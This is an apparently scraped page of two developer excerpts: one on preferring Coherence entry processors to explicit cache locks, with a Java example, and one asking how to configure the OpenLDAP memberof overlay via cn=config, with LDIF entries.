    For many developers using Coherence, the first place they look for concurrency control is the com.tangosol.util.ConcurrentMap interface (part of the NamedCache interface), which includes methods for explicitly locking data. Despite the obvious appeal of a lock-based API, these methods should generally be avoided for a variety of reasons:

    - They are very "chatty": they can't be bundled with other operations (such as get and put), and there are no collection-based versions of them.
    - Locks do not directly affect mutating calls (including puts and entry processors), so all code must make explicit lock requests before modifying (or in some cases reading) cache entries.
    - They require coordination of all code that may mutate the objects, including the need to lock at the same level of granularity (there is no built-in lock hierarchy and thus no concept of lock escalation).
    - Even if all code is properly coordinated (or there's only one piece of code), a failure during updates may leave a collection of changes to a set of objects in a partially committed state.
    - There is no concept of a read-only lock.

    In general, the use of locking is highly discouraged for most applications. Instead, the use of entry processors provides a far more efficient approach, at the cost of some additional complexity.
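
    As an illustration, a hedged sketch of the entry-processor alternative (the Coherence API calls shown - CacheFactory.getCache, NamedCache.invoke, AbstractProcessor - are the standard ones; the cache name, key, and processor logic are invented for the example; a real deployment would also need the processor to be serializable, e.g. via POF):

        import com.tangosol.net.CacheFactory;
        import com.tangosol.net.NamedCache;
        import com.tangosol.util.InvocableMap;
        import com.tangosol.util.processor.AbstractProcessor;

        public class CreditProcessor extends AbstractProcessor {
            private final double amount;

            public CreditProcessor(double amount) { this.amount = amount; }

            @Override
            public Object process(InvocableMap.Entry entry) {
                // The read-modify-write runs atomically on the storage node
                // that owns the entry - no explicit lock()/unlock() calls.
                Double balance = (Double) entry.getValue();
                entry.setValue(balance + amount);
                return null;
            }
        }

        // Usage:
        // NamedCache cache = CacheFactory.getCache("accounts");
        // cache.invoke("account-42", new CreditProcessor(100.0));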

    Read the article

  • How do I configure Reverse Group Membership Maintenance on an openldap server? (memberOf)

    - by emills
    I am currently working on integrating LDAP authentication into a system, and I would like to restrict access based on LDAP group. The only way to do this is via a search filter, and therefore I believe my only option is the use of the "memberOf" attribute in my search filter. It is my understanding that "memberOf" is an operational attribute which the server can create for me any time a new "member" attribute is created for any "groupOfNames" entry on the server. My main goal is to be able to add a "member" attribute to an existing "groupOfNames" entry and have a matching "memberOf" attribute be added to the DN I provide.

    What I have managed to achieve so far: I'm still pretty new to LDAP administration, but based on what I found in the OpenLDAP admin's guide, it looks like Reverse Group Membership Maintenance, aka the "memberof overlay", would achieve exactly the effect I am looking for. My server is currently running a package installation (slapd on Ubuntu) of OpenLDAP 2.4.15, which uses "cn=config" style runtime configuration. Most of the examples I have found still reference the older "slapd.conf" method of static configuration, and I have tried my best to adapt the configurations to the new directory-based model. I have added the following entries to enable the memberof overlay module.

    Enable the module with olcModuleLoad (cn=config/cn\=module\{0\}.ldif):

        dn: cn=module{0}
        objectClass: olcModuleList
        cn: module{0}
        olcModulePath: /usr/lib/ldap
        olcModuleLoad: {0}back_hdb
        olcModuleLoad: {1}memberof.la
        structuralObjectClass: olcModuleList
        entryUUID: a410ce98-3fdf-102e-82cf-59ccb6b4d60d
        creatorsName: cn=config
        createTimestamp: 20090927183056Z
        entryCSN: 20091009174548.503911Z#000000#000#000000
        modifiersName: cn=admin,cn=config
        modifyTimestamp: 20091009174548Z

    Enable the overlay for the database, letting it use its default settings (groupOfNames, member, memberOf, etc.) (cn=config/olcDatabase={1}hdb/olcOverlay\=\{0\}memberof):

        dn: olcOverlay={0}memberof
        objectClass: olcMemberOf
        objectClass: olcOverlayConfig
        objectClass: olcConfig
        objectClass: top
        olcOverlay: {0}memberof
        structuralObjectClass: olcMemberOf
        entryUUID: 6d599084-490c-102e-80f6-f1a5d50be388
        creatorsName: cn=admin,cn=config
        createTimestamp: 20091009104412Z
        olcMemberOfRefInt: TRUE
        entryCSN: 20091009173500.139380Z#000000#000#000000
        modifiersName: cn=admin,cn=config
        modifyTimestamp: 20091009173500Z

    My current result: with the above configuration, I am able to add a NEW "groupOfNames" with any number of "member" entries and have all the involved DNs updated with a "memberOf" attribute. This is part of the behavior I would expect. While I believe the following should also have been accomplished by the memberof overlay, I still do not know how to do it, and I would gladly welcome any advice:

    - Add a "member" attribute to an EXISTING "groupOfNames" and have a corresponding "memberOf" attribute be created automatically.
    - Remove a "member" attribute and have the corresponding "memberOf" attribute be removed automatically.
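
    For reference, a hedged sketch of the modification in question (all DNs are hypothetical), applied with ldapmodify; with the overlay active, the server is expected to maintain the matching memberOf on the member's entry. One commonly mentioned caveat: the overlay only intercepts writes made after it was enabled, so memberships that pre-date it may need to be deleted and re-added.

        # add-member.ldif
        dn: cn=mygroup,ou=groups,dc=example,dc=com
        changetype: modify
        add: member
        member: uid=jsmith,ou=people,dc=example,dc=com

        # Applied with:
        # ldapmodify -x -D cn=admin,dc=example,dc=com -W -f add-member.ldif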

    Read the article
